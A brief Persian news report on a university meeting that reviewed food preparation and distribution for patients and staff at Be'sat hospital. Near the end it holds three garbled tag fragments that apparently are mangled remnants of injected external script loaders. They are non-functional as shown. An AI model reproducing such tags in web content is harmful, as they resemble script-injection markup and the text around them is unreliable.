برگزاری جلسه و بررسی اسناد تهیه و طبخ و توزیع غذای بیماران و پرسنل بیمارستان بعثت

 

جلسه و بررسی اسناد تهیه و طبخ و توزیع غذای بیماران و پرسنل بیمارستان بعثت در دفتر مدیریت امور رفاهی و پشتیبانی دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه و بررسی اسناد تهیه و طبخ و توزیع غذای بیماران و پرسنل بیمارستان بعثت  با حضور آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه و کارشناسان مربوطه برگزار شد.

در این جلسه به مسائلی همچون، انتخاب پیمانکار، کیفیت و نحوه طبخ غذای با کیفیت برای رفاه حال بیماران و کارکنان بیمارستان های مذکور و … پرداخته شد و نقاط قوت و قابل بهبود بررسی گردید.

 <2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *